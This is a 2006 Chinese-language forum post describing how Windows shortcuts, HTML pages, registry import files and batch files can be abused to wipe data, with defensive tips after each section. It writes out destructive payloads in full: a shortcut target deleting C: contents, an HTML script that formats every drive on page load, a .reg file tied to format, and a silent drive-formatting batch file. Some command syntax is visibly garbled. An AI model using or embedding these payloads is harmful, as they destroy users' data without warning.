查看單個文章
舊 2006-01-06, 02:57 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 常用文件的恐怖用法

前言

  有幾種文件是要非常小心的,但如果是你自已專用而又不上網的電腦,那你大可不看。由於本人能力有限,只分析四種常用檔案類型。危險文件有木馬服務端,也有病毒文件,但我的槍口不對它們,我要瞄準另一群「熟人」,日久見人心啊!

一、建立捷逕

  建立捷逕也恐怖哦,比如惹毛了一個老實的人,那將不堪設想,經常新增建立捷逕的朋友肯定知道「目標 」這一欄,或者檢視已有的建立捷逕的內容、也有「目標」這欄,既然可以在「目標」這欄使用相應的程序,那麼使用format或deltte指令加幾個參數會如何呢?在「目標」裡填入:「c::\windows\command\delete/y c :\*.*」(要引號)。那麼,你C碟根目錄的東西就魂飛魄散了,理論上可以使用任何應用程式,指向DOS、指向文件、指向求助文件、輸入法漏洞就可以新增NET文件建立捷逕、在「目標」裡填入相關指令便可以取得管理員權限,這具體不說,因為不在本文討論範圍內,欲知詳情請查閱相關資料。

防護方法:

   將:Windows/command/format或delete等有毀滅性指令文件改名。對於來路不明的建立捷逕最好先檢視內容中的「目標」再決定是否執行。

二、HTML文件或HTM文件

  HTML是超文本標幟語言,是一個功能強大的語言,可以使用自身以外的指令碼,如VBS、JS 、GIP還可以使用Activex控件,現在在廣闊的網路空間裡,一個最小的個人網站也有一個首頁,這麼廣泛使用的文件為什麼是 恐怖文件呢?就像地球60多億人口中有恐怖份子,一個道理嘛!有人在該檔案類型文件裡加入惡意程式碼,注意,我這裡說的不是改寫註冊表改IE的惡意程式碼。而是說直接加入DOS指令的,當瀏覽到含有下面程式碼的頁面時,就會彈出26個DOS視窗,從Z盤格式化到A盤,速度極快,程式碼如下:

<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh></OBJECT>
<SCRIPT>
wsh.Run('start /m format.com z:/q /autotest /u');
wsh.Run('start /m format.com y:/q /autotest /u');
wsh.Run('start /m format.com x:/q /autotest /u');
wsh.Run('start /m format.com w:/q /autotest /u');
wsh.Run('start /m format.com v:/q /autotest /u');
wsh.Run('start /m format.com u:/q /autotest /u');
wsh.Run('start /m format.com t:/q /autotest /u');
wsh.Run('start /m format.com s:/q /autotest /u');
wsh.Run('start /m format.com r:/q /autotest /u');
wsh.Run('start /m format.com q:/q /autotest /u');
wsh.Run('start /m format.com p:/q /autotest /u');
wsh.Run('start /m format.com o:/q /autotest /u');
wsh.Run('start /m format.com n:/q /autotest /u');
wsh.Run('start /m format.com m:/q /autotest /u');
wsh.Run('start /m format.com l:/q /autotest /u');
wsh.Run('start /m format.com k:/q /autotest /u');
wsh.Run('start /m format.com j:/q /autotest /u');
wsh.Run('start /m format.com i:/q /autotest /u');
wsh.Run('start /m format.com h:/q /autotest /u');
wsh.Run('start /m format.com g:/q /autotest /u');
wsh.Run('start /m format.com f:/q /autotest /u');
wsh.Run('start /m format.com e:/q /autotest /u');
wsh.Run('start /m format.com d:/q /autotest /u');
wsh.Run('start /m format.com c:/q /autotest /u');
wsh.Run('start /m format.com b:/q /autotest /u');
wsh.Run('start /m format.com a:/q /autotest /u');
</SCRIPT>


  有些文章說的危險文本文件是指file.txt.html其實也是html文件,只不過圖示是文本文件的,實質就是網頁文件。我來解釋一下參數意義。/q是快速格式化。/autotest是自動檢測分區檔案類型參數。/u是無格式化看了上面是否勾起你當年痛苦的回憶,不用怕,照下面幾點做就可以杜絕這種事再次發生。

防護方法:

  1、不要瀏覽陌生的HTML文件,在未知情況下套用記事本看文件來源碼是否有惡意程式碼以確定是否執行。
  2、IE彈出對話視窗提示該頁面不安全之類的,除非你清楚地知道你在做什麼,否則千萬不要點確定。
  3、將windows/wscript.exe等網頁尾本解釋器改名,在IE中禁用指令碼偵錯,活動指令碼。把ActiveX控件和插件 關閉,把IE安全等級設為進階等。
  4、安裝網路防火牆,本人強烈推薦諾頓的產品。

三、註冊表匯入文件

  不要小看這種文件,任何東西都有好有壞,好的嘛,恢復註冊表;壞的嘛,格式化硬碟。如果危害沒這麼大, 我才懶得說。 用記事本編個kill.reg內容如下:

REGDIT4
(這裡要空一行)
[HKEY--CLASSES--ROOT\CLSID\shell\open\command]
@="format d: /q/u /autotest"


(這裡要空兩行)


  執行這個文件,硬碟便卡卡響了。

防護方法:

  1、用記事本開啟註冊表匯入文件檢視內容,判斷無誤後再決定是否執行。
  2、把那些危險指令改名。如format.com等

四、批次處理bat文件

  這是Dos下的三大可執行文件之一,只有bat文件可以用文本編輯器編寫,讓它替我們智能化的做一系列事情,省去很多煩瑣的工作。既然這樣,使用幾個指令怎麼樣?看過上面的朋友就知道了,馬上閃出format指令。怎麼樣?都是格式化或移除指令吧?所以我不說危險而說恐怖了,嘿嘿。開啟記事本或在Dos下輸入EDIT進文本編輯器。然後輸入以下內容:

@echo off
Wait for a moment ,please……Loading now!
@delete /y c:\. >nul
@format D:/q\uqautotest >nul
@format E:/q/u/autotest >nul

@echo game over ! I think you are going to die !


  然後存成*.bat文件執行看看吧。欲哭無淚吧?這個文件更加陰,不出任何提示,無聲無息格了你的硬碟。

防護方法:

  很恐怖吧?我們當然要預防,要避免這些文件的惡意攻擊,我總結了一些通用方法。

  一、既然文件都是使用文件,那麼就把那些文件移除或改名,如format .com delete.com等。
  二、既然都是格式化,大家知道,如果該分區執行了程序,那麼格式化將無法完成。所以,如果可以,每個分區都執行一些程序,如D碟執行mp3,E碟執行QQ,F盤執行防火牆......
  三、執行不明文件先檢視內容或來源碼。補充一點,還有一種文件,就是碎片文件,據說也有很強的破壞力,但我沒經歷過也沒見過,所以請哪位高手賜教,如果產生碎片文件,二話不說就刪去。
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次